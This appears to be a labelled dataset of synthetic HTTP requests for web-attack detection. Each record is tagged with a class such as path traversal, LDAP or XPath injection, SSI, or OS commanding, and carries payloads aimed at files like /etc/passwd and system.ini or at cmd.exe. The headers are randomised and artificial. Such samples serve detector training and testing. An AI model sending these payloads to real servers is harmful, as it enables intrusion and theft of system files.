Cache-Control: only-if-cached
Client-ip: 145.27.27.144
Cookie: shjevaSH=nph-eTEe;noaqfw4ro=dzPciawn7nhncaottr
Cookie2: $Version="556"
Date: Thu, 29 Mar 07 18:05:31 GMT
ETag: W/"JeOMB8IEzQqMZ5UXUF"
Expect: r1irf=e82e8ds;ueIe
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Sat, 15 May 04 08:04:34 UTC
If-Unmodified-Since: Mon, 28 Sep 09 22:27:24 CET
If-Match: "S380h@AwL-rl1Y_x4"
If-None-Match: "ByrT.aijP_C5xvp67"
If-Range: *
Max-Forwards: 1766
MIME-Version: 6.5
Pragma: eEl=bs
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: Digest realm
Range: 6-459,-64787
Referer: http://www.Zdxz.st/4a2BE/eoga/tsinfi6Y.mdb
TE: gzip
Trailer: Warning
User-Agent: wjg1e0otPb/8.9.4.3
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6396x837
Via: 8.9 www.cslitr.js:32
Transfer-Encoding: identity
Upgrade: asneah/1.8, akhg/1.6
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 223.134.122.135
X-Serial-Number: 16212196997401300
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44402
Start - Id: 48791
class: XPathInjection
GET /dLRc/oqb/iAzlyA_98-gfBvgt/nodeOlocation-Lr/a7q9t1i3e/hsre/ef0nnfxtn.asp?haertWihozv=98105941&g8=2251&ki.gprmT7Z=ztcEmBxaeleSTtuafo&eshked=382&9rv5eamoeC=bx3wcEOpo&asxp_g8VallUrwPO=%28i+++%3C+++count%28Si5%2Fchild%3A%3Atext%28%29%29++++and++++j+%3C+++++count%28ail%2Fchild%3A%3Acomment%28%29%29+++++and++k+++%3C+count%28ph%2Fchild%3A%3A*%29+++++%29&jn=2&D7PhomeJ=9892580 HTTP/1.1
Host: 122.115.8.231:0
Connection: close
Accept: application/x-tar;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: MtCoaapp-wOaw, Ulh-ol;q=0.4, enus-mcps, oa-eqt3oyoo
Cache-Control: no-cache
Client-ip: 208.70.172.168
Cookie: Hscsuaehs=0769;noratte9rwal=qLs8q
Cookie2: $Version="7"
Date: Tue, 19 Jul 05 24:56:27 CET
ETag: W/"ss3oYqwA5LRwWDU"
Expect: elan
From: iinongn@mnxs.it
If-Modified-Since: Sun, 05 Aug 07 10:19:33 UTC
If-Unmodified-Since: Sat, 27 Aug 05 06:17:41 GMT
If-Match: "APQ6Ske@TeuPoC.3I"
If-None-Match: "z4.RB3pIiLz5Ap_6Y7d"
If-Range: *
Max-Forwards: 02
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: yeerry vuplo=4rasqRlo
Authorization: Basic dTBzcmJsc2I6dHdzYXRy
Range: -2670
Referer: http://www.cnnewtat.fr/oedvqa/aeci9oer/tooi.js
TE: chunked
Trailer: If-Match
User-Agent: Mozilla/7.5 (compatible; Konqueror/6.5; Solaris; idtEl)
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 682x396
Via: ood/9.9 229.35.122.206:253, 4.1 5.28.203.146:15
Transfer-Encoding: compress
Upgrade: zT3/4.9, hrK1te/0.3, iIQppa/8.1, uhVyt/5.1
Warning: 538 www.cErriaih.tiff:9 "osyScc8wde9ls" 
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 91085998772983
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48791
Start - Id: 35986
class: PathTransversal
POST /sFm3pscriptbb.6wJhomeZ7/xhy@Vv7./NdKq/lmhhT0HFEHAoBg.shtml? HTTP/1.1
Content-Length: 270
Content-Language: s,lc2,byic
Content-Encoding: deflate
Content-Location: http://www.aiaZi3tc.be/9slvls/nIfI/zaChba7.php3
Content-MD5: UmV2YXMydEUxYWFub3VneQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 May 07 13:28:15 CET
Last-Modified: Thu, 03 May 07 19:41:11 UTC
Host: www.taRtiDweoC.net
Connection: thsitem
Accept: application/*, text/*;q=0.9, image/gif;q=0.7
Accept-Charset: *
Accept-Encoding: gzip;q=0.9, gzip;q=0.5, identity, identity;q=0.1, compress;q=0.4
Accept-Language: t-fgo5eNn;q=0.8, dt-asii;q=0.1, de-h6Fty
Cache-Control: only-if-cached
Client-ip: 110.8.182.127
Cookie2: $Version="01"
Date: Wed, 03 Mar 04 12:59:56 CET
ETag: "mF.PGpo8XgOKlZ_"
Expect: neunMot=rOmfelow;ien9s2e
If-Modified-Since: Mon, 13 Dec 04 10:30:50 GMT
If-Unmodified-Since: Sat, 01 Apr 06 11:15:24 UTC
If-Match: *
If-None-Match: "iKir9LhZTNKF8Wn"
If-Range: Thu, 03 Dec 09 16:53:05 GMT
Max-Forwards: 4170
Pragma: ourn='et7eh'
Proxy-Authorization: Basic bmlscm5ndDpkMjh1YWE5
Authorization: NTLM aWx0aHRhaWk1b3hreXVzZXdjZTZ0ZWFSbmc2ZXN0ZGU=
Referer: http://eeki.cz/rEst/nNpar8c/adnei.pdf
TE: chunked;q=0.2
User-Agent: Mozilla/4.7 (X11; U; Open BSD i586 5.1; se-y2; rv:5.7.2) Gecko/65022393
Transfer-Encoding: deflate
Upgrade: Oserl/7.4, qevnuc/3.1, 3mk6/5.1
X-Forwarded-For: 59.156.7.223

Svit=7262&sseat8fad=758372&et=412070789&I7eynrf=43&enetnnjyo=r3ULz1G&betEOeNnnE=tdhr %3s7cge=h~i&ewmvodkowpcin=oron&7nOds5=t?Cdettrsi6su&tno2necseMeu=10092695&tels2oos8foet=../../../../../../../../../WINNT/autoexec.bat&r44eeeauhi=ic5pisTtgprc

End - Id: 35986
Start - Id: 37109
class: LdapInjection
GET /0psnHiOwPBZy/ltutdnre/Bhw02sK_Pmocha/G84@@.jsp?pfi9LzJO6=shtcMriltorE8Isai&1Etaiaa9Ra3kit=%3B%3D0+En&plsrx1j=0&rilesnela=3heeitidfbetweendt&kmIiL=%29++++%28+%7C+%28eeart%3DL6mte*%29&tsh1r=patetkb+mh+eomo2o3&vjTuSdocumentcdstyleservices.e=3&eOIeeacelC2r6T=%3F%3FNoy+yihgeLHdd0echop&esj=wp-otmhabtS HTTP/1.1
Host: www.sd7NsannsY.com
Connection: keep-alive
Accept: video/*;q=0.9, audio/*;q=0.8, image/*;q=0.5
Accept-Charset: x-mac-greek;q=0.0, x-mac-chinesesimp;q=0.2, iso-2022-jp
Accept-Encoding: compress;q=0.3, deflate;q=0.8
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 82.149.38.78
Cookie: XJMq.wr=2iHhciltrltt;movlebetweenm=568;kiglhtrti1elch=yenef8siHaex6eikho;sisaizoeerrT='uekmsog Ae 0Em;nGaois0mho4nn1=24465;aimtitAhlteRS=046
Cookie2: $Version="656"
Date: Sun, 01 May 05 04:28:45 CET
ETag: W/"xd@6ixSS3TZ3a9Iy"
Expect: 100-continue
From: moaqfoa@te8R.fr
If-Modified-Since: Mon, 26 Jun 06 16:05:08 CET
If-Unmodified-Since: Mon, 07 Nov 05 09:42:11 UTC
If-Match: *
If-None-Match: "ojSgwCgdRWGkrwDAJh"
If-Range: "ifWckLlt8tHn_FJG2wzt"
Max-Forwards: 43
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: Digest response="22AF7033a49C83DF9fE5d8bDEc06BEe0"
Range: -9071,2584-
Referer: http://dde8l.uk/oHihesc/htnoe/c4ongNGt.mpeg
TE: trailers,trailers,chunked
Trailer: Via
User-Agent: 5esfnsi
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 617x3755
Via: HTTP/3.4 www.25eOpS.html
Transfer-Encoding: ssaiun; saaanr=elEnru
Upgrade: oehg/2.3, ilinE/9.0
Warning: 296 92.253.127.230:14 "0shhdnca" "Sun, 22 Feb 04 22:26:45 CET"
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 85332942046227560401
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37109
Start - Id: 39404
class: SSI
GET /6rlhfoEtinscLlrehn/efD1G/njMquJvR/L8/aesearnnlnaeiu1.png?dyX-l3Czc0=o6mbab44daog&OeRa=+ar+itE0ne%29etcio-lm&raetitcthti1Mo=okeEr%29a8oLmde&.ambcpX7Y=%2B&YZGAgI=ijK00Ev42&nSedly8tjahh=Fjsn&Wegoneaut9r=6&ttd6eAsso1t9tt=%3C%21--%23email+fromhost%3D%22www.livan6lh.com%22+tohost%3D%22mailbox.uuoC.com%22+message%3D%222ino+6ae0de+ais4+herhg%22+fromaddress%3D%22ep68.com%22+toaddress%3D%22Arps.5nste.com%22+subject%3D%22eo%22+sender%3D%22a2h.com%22+replyto%3D%22nnmtlSH.com%22+cc%3D%22ek%22+inreplyto%3D%22rzhfe+fsa+loeo0%22+id%3D%22esOTmail%22+--%3E&PGSchildlibsjlW=%3Ark&gpaSnnaon=%3Anh&iimygItOsie=nqs+uutsbY&CaMoytUZoCw8=1d%3F&P_BixiajCul=5eenk%3Aas HTTP/1.1
Host: 233.103.192.135
Connection: nAnt
Accept: */*;q=0.5
Accept-Charset: x-mac-greek;q=0.3, windows-1255, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: ab-S
Cache-Control: no-cache
Cookie2: $Version="6"
Date: Mon, 19 Mar 07 22:29:18 CET
ETag: W/"25Kpjj4nIKKJBndjeb"
If-Unmodified-Since: Sat, 17 Jul 04 23:58:21 CET
If-Match: *
If-Range: Tue, 05 Feb 08 22:07:51 CET
Max-Forwards: 3
MIME-Version: 5.4
Pragma: no-cache
Authorization: NTLM d3NsdHVuZGwzcmdpN213blR0aXR0aTRkbnNhbGoxOGZrbHd3Sg==
Referer: http://www.eiazhh1.be/urhecn/6txtaeBn/eepaeiee/e9e9auf/nrsdo.htm
Trailer: If-Match
User-Agent: odOtibcoe/2.6
UA-CPU: x86
Via: FTP/5.8 www.btteco.gif, 8.6 74.56.56.252, 8.1 www.q25hh.gif
Transfer-Encoding: gzip

null

End - Id: 39404
Start - Id: 43972
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.ithnbxttof.fr
Connection: close
Accept: text/xml;q=0.0
Accept-Charset: iso-8859-7
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=32
Client-ip: 59.162.254.26
Cookie: 5f6IlAr=3;t1kAXZiZKgroup byKS=positionnhtacces8Rsrf;hRiozUa=eaa8
Cookie2: $Version="45"
Date: Sat, 27 Oct 07 18:11:21 UTC
ETag: W/".M73M1s.vEWh-qdTs"
Expect: Teocbl
From: axenii@lMdner.de
If-Modified-Since: Sun, 23 Apr 06 15:11:01 UTC
If-Unmodified-Since: Thu, 23 Oct 08 17:17:14 CET
If-Match: "-p2rLxjVRyesjAFX.Q"
If-None-Match: *
If-Range: Wed, 26 Dec 07 09:23:21 CET
Max-Forwards: 145
MIME-Version: 6.8
Pragma: parnlr='erdoa2c'
Proxy-Authorization: Digest nonce
Authorization: Digest response="bCb71bf84af70Cd0eF014Adf964Ab7FA"
Range: 2873-08
Referer: http://bshaaeo.be/oewoo/b9eoc/d7ntd.gz
TE: deflate
Trailer: Referer
User-Agent: Mozilla/0.3 (Windows; U; Win98 1.0; Np-si; rv:8.9.9) Gecko/01084421
UA-CPU: StrongARM
UA-Disp: 7638,7203,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2346x026
Via: odna/0.5 www.llklra35.gif, htiw/3.3 www.iygyyfy.jpg:426
Transfer-Encoding: compress
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 185 www.ayfae.tiff:7 "h2dyo3oifn2sa9H7" 
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 552046622508653273
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43972
Start - Id: 48783
class: XPathInjection
GET /boovsfihah5avrsoAten/7snpr/5yddolftimkQdewti20/tioBnbiolt4dt/V6vbscriptM2L.shtml?ecew8tzso90mb8=9ltaeaLvbnls%27&zJ6K7ZB=45&sae=eQnk&e05erqbm=eeFel7eeaDoblrnSns&slyqhtmsqcUtaR=254269&ceN3usteHh=3583136&dihwah=5537793011&odeNuane6emble=zQne3a%27%5D+++++%7C++P++++%7C+%2F%2Fuser%5B++++name%2Ftext%28%29++++%3D%27gtlC&vanseOoeyebo=8641&6ojBz=ehBESIFQdHpu&szmr8nhd=s1kkIcfr&p5boot.inixSpt0=77699&php48CY=ioreplaceform%2Bsftpan1r9&inputCQtwherelocationWV=93670 HTTP/1.0
Host: www.imXts8rqoe.gov
Connection: gyCxenr
Accept: audio/basic, video/mpeg, application/x-tar;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.8
Cache-Control: min-fresh=0
Client-ip: 132.160.12.174
Cookie: airovEi2bi=eoSK;ciIleii4=49821
Cookie2: $Version="33"
Date: Sat, 31 Jan 04 04:15:38 CET
ETag: "OBU@UM7En1vWUhLG2"
Expect: 100-continue
From: iinongn@mnxs.it
If-Modified-Since: Wed, 30 Jan 08 04:28:44 CET
If-Unmodified-Since: Tue, 27 Jun 06 13:45:48 GMT
If-Match: *
If-None-Match: "3v1xc3Y@aP5V96lDrok"
If-Range: "Hht5g1_0RxjQCKvG9"
Max-Forwards: 8
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: bfgi rtRa=dsun
Authorization: NTLM ZW9JeWdhbzhVc2J0amhrdFZpbmVlcm1vVHRucVQxZ3p0cWpodGhmb2ZlZA==
Range: 512488-28725,-179,34439-
Referer: /irc7r/emogG/rlibeao/odzpt3e.avi
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/2.4 (compatible; Konqueror/1.0; Open BSD i586; eSnl; umtktnae; t7eglAttEs)
UA-CPU: Sparc
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0640x829
Via: HTTP/5.7 www.ek1n.html, 8.6 80.28.150.184
Transfer-Encoding: deflate
Upgrade: dMji/4.6, m1ce/2.1, ittqim/8.3, stojw/5.9, fftt/6.2
Warning: 022 17.182.45.11:3 "otrr6o" "Sun, 18 Jun 06 04:34:44 GMT"
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 91085998772983
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48783
Start - Id: 36332
class: PathTransversal
GET /cPH_bpHLjT74BYnyP/ra5g7roelspiE/lQx2@h@fzAX1lM/thergs/h.xUPx0OZ590G/sDoSMelh_5UzRfCJ/owiaeavvdiogCeo.swf?nlaRtn3snrcrt=552884&ic3esilh5etybos=tBorupoMoeysvirdmaileee&Nlrerix=%2Fetc%2Fpasswd&l4oVh=295&beceLedeRnoia=Hoysftihhe&e5qhe4=106&HeuoOx1=csbtoniar+feiidiv%2F5&PUYyfY=l0ivsXGuC6S HTTP/1.1
Host: 70.39.232.112
Connection: wni7cta
Accept: image/*, application/*, application/x-tar;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: 1cne-ocerNg, lQe-O, REknonfs-VsobtDt;q=0.9, i-r4Fn, Mwfr3a-2sot8s6i;q=0.1
Cache-Control: max-age=6
Client-ip: 179.242.140.245
Cookie: tleDraroftytira=?ter;aotMlreXtPi1=nveTcb;RYlogK5jPtX2P=52246655
Cookie2: $Version="71"
Date: Fri, 27 Apr 07 18:43:39 UTC
ETag: "KKhQbn19W6.DkIaJH@f"
Expect: 100-continue
From: aisg@6friP6nIal.st
If-Modified-Since: Thu, 07 Aug 08 12:20:52 GMT
If-Unmodified-Since: Wed, 04 Aug 04 22:13:08 CET
If-Match: "2brndKdCMduww7PH"
If-None-Match: *
If-Range: ".EK8LPwHe3nrwYsMSq"
Max-Forwards: 906
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic b25sY29kb0o6d3dsaGVz
Authorization: NTLM dWVlN2U5Y2RoYmN0b2h0dGRlb21zbHRhMXQ4aG5zeW5yZWR0ZGJ0aA==
Range: 94941-674,-88804,1546-98301
Referer: http://www.ilos.uk/cu9ammee/otul/tajuhyif.gz
TE: trailers
Trailer: User-Agent
User-Agent: etdpe4aetoitf
UA-CPU: MIPS
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 625x983
Via: FTP/1.8 www.o5tvnm.js, HTTP/7.8 www.EeqaeiP.jpg
Transfer-Encoding: gzip
Upgrade: itor/5.7, 4up4ta/3.2
Warning: 187 www.erlho.html "TnrEu" "Thu, 07 Sep 06 16:36:18 GMT"
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 876584717
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36332
Start - Id: 35996
class: PathTransversal
POST /iTbK9/BI@.js? HTTP/1.1
Content-Length: 152
Content-Language: Rsawstn
Content-Encoding: deflate
Content-Location: /ebOeoosb.gz
Content-MD5: b3ROZWdvaWloM1JlYWhiZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 03 Dec 05 20:24:51 CET
Last-Modified: Sun, 19 Aug 07 13:02:45 GMT
Host: 125.59.76.248
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: n-5do, 1r-a6i;q=0.7
Cache-Control: max-age=9
Client-ip: 11.175.85.5
Cookie: GcatVf-rT2FX=ietinm;Lbhona=313520925;is=9935674;3phoohko=7logl= 
Cookie2: $Version="232"
Date: Sat, 11 Feb 06 08:22:32 GMT
ETag: W/"BlYWiXEeTeQyj4LLGp5t"
Expect: 100-continue
From: rA7tR@tqia61e.ch
If-Modified-Since: Thu, 10 Aug 06 10:39:54 UTC
If-Unmodified-Since: Mon, 01 Nov 04 08:59:29 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 07 Mar 10 01:51:44 CET
Max-Forwards: 4
MIME-Version: 5.1
Pragma: yiene3ai='roxtNSns'
Proxy-Authorization: Basic bmlscm5ndDpkMjh1YWE5
Authorization: Basic dHR0NGNvdTptZG9EZHl1
Range: 34063-7921,92-84013,52-
Referer: http://tqiunAo9.org/yptT0.htm
TE: chunked,trailers,chunked
Trailer: Accept-Encoding
User-Agent: rpqESE
UA-OS: Win98
UA-Pixels: 551x993
Via: HTTP/9.1 www.lky8sso.jpg
Transfer-Encoding: compress
Upgrade: uUi/7.8, eeds/2.6, Myede/4.4
Warning: 420 www.esiroa.js "tdoieaa" "Wed, 03 Jan 07 09:34:59 GMT"
X-Forwarded-For: 133.228.168.254
~~~~~: ~~~~~~~~~~~~~~~~~~~~

tmETslu=tuel?s0erm&1esmepczevide=..\..\..\..\..\..\WINNT\system.ini&tTwm0eU=yhfr&tTwliiOeis5l=ie%ub~d >tctcreplaceCiehd&FS=tg/yp

End - Id: 35996
Start - Id: 36112
class: PathTransversal
GET /hmx/28AugoJsTtKB/ybApL79htaccesPC/Ieoqucj/ighayplYatTohNa9/ZY_LHbLZcG/uht/h1EKDPN6to.php3?aemenss7e93thhh=f+bt%3E&lehaeeaewuh=1244191&openyXYLsrFrhc=xh2bt&rhnjEq=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini HTTP/1.1
Host: www.swn49.fr
Connection: isvctea7
Accept: */*;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: deflate, gzip;q=0.5, compress;q=0.2
Accept-Language: mnis-elaem;q=0.5
Cache-Control: no-transform
Client-ip: 180.199.9.54
Cookie: ai1eya9E3=74546;ndhc=19437879;itEinsl0El=systemoselecthal=aInbncn\e ;qchnnhin=g52tneiieae;eei=9;l6=ndncddtdgtxyu
Cookie2: $Version="163"
Date: Mon, 15 Oct 07 01:18:52 UTC
ETag: W/"lwclySd@piARZiDF"
Expect: 100-continue
From: 7Croe@kumvreNv.biz
If-Modified-Since: Thu, 27 Mar 08 18:49:54 CET
If-Unmodified-Since: Fri, 22 Oct 04 18:45:40 CET
If-Match: "XjYYwN3tMsJw3vXwQU"
If-None-Match: *
If-Range: *
Max-Forwards: 18
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Digest realm
Range: 9844-66,0-,-297
Referer: http://www.es9r.de/lEelat/Tnb3ab/nsletShe/rHtoO6.php
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.3 (X11; U; Open BSD i586 2.6; Ce-7a; rv:3.4.7) Gecko/35577268
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7606x3250
Via: iot/8.4 www.uWimg.html, 2.3 www.Ernewesi.jpeg, 9.5 159.184.176.95
Transfer-Encoding: hOho; egatiOUo=si2ihi
Upgrade: iormhs/9.8
Warning: 643 99.90.218.216 "i6te3torsbteItixa4tu" 
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 7294579742813634
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36112
Start - Id: 38691
class: LdapInjection
GET /ej0IIYJotnYThLn/s5_yjrjhAs/eA7riqimH/olAnuoBialtent/eKDvFH72F@/wwKWFs6tS4RjLRN/IpzfM1KdmI/oo2tndgefrcwopplngss/stysosrnEA/dE9J/nAADU/oEAH.png?tS=414182225&aet=244174&ioeeiro8eitheha=xarf&9nlog.2es=hPBhfPIeV&2boot.inivL49e8=%29++++%28++++%7C+%28+cn%3D*o%27brien*+%29%28mail+++%3D*o+%27brien*%29+&otTitdnibt=+inbetweenru&lszenn6=ngroup+byhaAa&lhLRc5=rbAWv HTTP/1.0
Host: 155.159.130.47:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-chinesesimp, windows-874;q=0.9, windows-874, iso-8859-8-i, euc-tw
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.4
Cache-Control: min-fresh=2
Client-ip: 19.232.160.156
Cookie: 8sa2oaaasT9xcwi=htpofec8nc(dsjl|io;m4nScsoe9lddnRw=50
Cookie2: $Version="63"
Date: Sat, 31 Mar 07 05:14:53 CET
ETag: "EvxKQQHQRlpZyyner"
Expect: ribEgiA=itelO;odita
From: nTromT8u@pzcel.it
If-Modified-Since: Fri, 03 Aug 07 10:34:50 GMT
If-Unmodified-Since: Sun, 30 Apr 06 23:43:38 CET
If-Match: "nArH4aYAaWqdjwu"
If-None-Match: "82WF.AE6RI@rmqrM99"
If-Range: "Wv9gL_-obcZFL69mR5OV"
Max-Forwards: 6840
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Ns5wt sihbnas=Atnr6O
Range: 32-1,3888-481886
Referer: /ar9uAE/x6rwe/F5spicto/t0qhl1n.ace
TE: deflate;q=0.7,trailers
Trailer: Cache-Control
User-Agent: udxh-XegH http://www.nnrt.st
UA-CPU: 68000
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 420x9995
Via: 0.1 www.dida.jpeg, 3.6 178.2.65.161, tkUtN/6.4 www.dyvlseh5.htm
Transfer-Encoding: YrEt; bdhhi=osdttA
Upgrade: s1i4r/2.1, mrhpoe/7.3, dua/2.5, lrn/6.4
Warning: 502 www.ssta3set.jpeg "SptsmeMga8ettons" "Wed, 02 Apr 08 05:31:51 CET"
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 7677444389981478018
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38691
Start - Id: 36548
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 29.65.61.89
Connection: keep-alive
Accept: audio/*;q=0.4
Accept-Charset: iso-8859-15
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-age=16230
Client-ip: 131.100.188.215
Cookie: msaOetun=r2N;l9NBTq=$anm
Cookie2: $Version="7"
Date: Sat, 02 Aug 08 24:27:59 UTC
ETag: "qAEfzWG5X7Zdf0i"
Expect: 100-continue
From: h8IMoanr@hlhircha.ch
If-Modified-Since: Tue, 13 Apr 10 10:59:01 UTC
If-Unmodified-Since: Thu, 10 Mar 05 13:05:47 GMT
If-Match: *
If-None-Match: "mjNwGbHAxe-3M0DGNWp3"
If-Range: "CAXSyzgpnM7i0TN.51g"
Max-Forwards: 51
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest nc=Ad95328B
Authorization: Digest nc=CEfE43E3
Range: -7292
Referer: /wN4c1ttl/Wksd/hFTtpl/uerrrmr.cfm
TE: trailers,gzip;q=0.8
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.4 (Windows; U; Win 9x 0.2; td-3s; rv:1.2.5) Gecko/26725999
UA-CPU: x86
UA-Disp: 1693,583,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 547x5195
Via: hdnv/4.0 165.212.249.40:0
Transfer-Encoding: compress
Upgrade: syjne/7.2
Warning: 091 www.ihosnnr.htm "pcnttofmn" "Fri, 10 Jun 05 17:10:45 GMT"
X-Forwarded-For: 103.73.131.132
X-Serial-Number: 55534835625911216707
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36548
Start - Id: 38679
class: LdapInjection
GET /ZformJx13Xdxt@/9dvWvlvieenogsno/deeaerrnzrnchwr/aMwYmWcinputtmpAorl/stpaue34/dtwtretcfe/Ncat/passthruXsDIF/hyokE/wApBk7ilQXZl8d-.sh?v7bcnOEGo=zyrziuoaHnuxsbtode&l3fV5YPUS4A=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.0
Host: www.iagn5g.uk
Connection: close
Accept: image/*, image/*;q=0.4, application/x-tar;q=0.0
Accept-Charset: iso-2022-kr, cp-936, ks_c_5601-1987;q=0.2
Accept-Encoding: identity, compress, gzip, compress, compress;q=0.2
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 194.227.156.180
Cookie: ikecelljz=tGa m afe5ub-9b:;XftpLscriptBwindow.open=86758;etsRcuondgOtha=r2ttZqUD@A;tsuascd=x9wb2tnB
Cookie2: $Version="37"
Date: Mon, 03 Mar 08 09:08:06 GMT
ETag: "EvxKQQHQRlpZyyner"
Expect: 100-continue
From: inel@eT4o.uk
If-Modified-Since: Sun, 06 Mar 05 05:02:56 CET
If-Unmodified-Since: Mon, 26 Apr 10 13:20:51 CET
If-Match: *
If-None-Match: "35o5wSZ8DNsm4.BVOG"
If-Range: *
Max-Forwards: 998
MIME-Version: 5.2
Pragma: rehfi5='bn'
Proxy-Authorization: NTLM NW9uckk4bWZtaXRyMGFvemFoaXJZZWNoZW5jaWV5Zmxpc2EzYXNOZWVzNXM=
Authorization: Basic YXNvdDpiZWhiNXRpZA==
Range: 39622-,-9614,-81153
Referer: http://www.7eEtee.be/uoEfmspj/sedtAeI/oearg2no/nonemdM/musre6.exe
TE: chunked;q=0.0
Trailer: Transfer-Encoding
User-Agent: eihteied6f/9.9.5
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3881x3799
Via: 6.3 58.231.90.251:38, 6.1 84.0.90.187
Transfer-Encoding: tcmPi
Upgrade: anRsj/9.4, 58agtG/6.3
Warning: 662 www.deregsns.gif:97 "htvam7uh0EcerdZsfa" 
X-Forwarded-For: 0.228.238.16
X-Serial-Number: 7677444389981478018
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38679
Start - Id: 38807
class: LdapInjection
GET /oEt5osobEi1p4e2efug/iU31u@Q-D/eB7nc4fnf/otsj/hnstoemsrpraedoehF/y9NIu9z/okUBWqMS/sdh5JY/tdyc/aTservicesf2DpBL/r3lmhFaNmpns9o/noTmnvtm9dhlboomha.exe?euNN7Da=acVkKop09a&siehme9uwtry=9492&.istdin6G=623%29%28%26%28objectClass%3Deera%29%28%7C%28sn%3D+++up0t%29%28cn%3Dwse+++++J*%29%29&rorl=caayne9dsGmcmt4Sqi&oord7rp=rdiv&no=lIvK66v&tktg=dtde&iIarrsb9s=e0gneeaetc05tbas7&PueEkEMnamsp=z&samM6xA._=rrt&lfeohc=90772419&r7opP7acozu=oov&tpNwluh1n=5 HTTP/1.0
Host: www.ozalnq.biz
Connection: keep-alive
Accept: video/mpeg;q=0.1, video/mpeg;q=0.8, text/plain
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: max-age=793
Client-ip: 103.147.207.153
Cookie: td2aoxOer=847
Cookie2: $Version="055"
Date: Sun, 22 Jan 06 04:16:28 GMT
ETag: "954BYt15GW0-QKluibg"
Expect: stgenha=alean
From: huUre@isis.com
If-Modified-Since: Wed, 14 Dec 05 21:30:02 UTC
If-Unmodified-Since: Thu, 11 Mar 04 20:22:53 GMT
If-Match: *
If-None-Match: "ysKomA0DHbx6d0WQ"
If-Range: *
Max-Forwards: 461
MIME-Version: 3.1
Pragma: no-cache
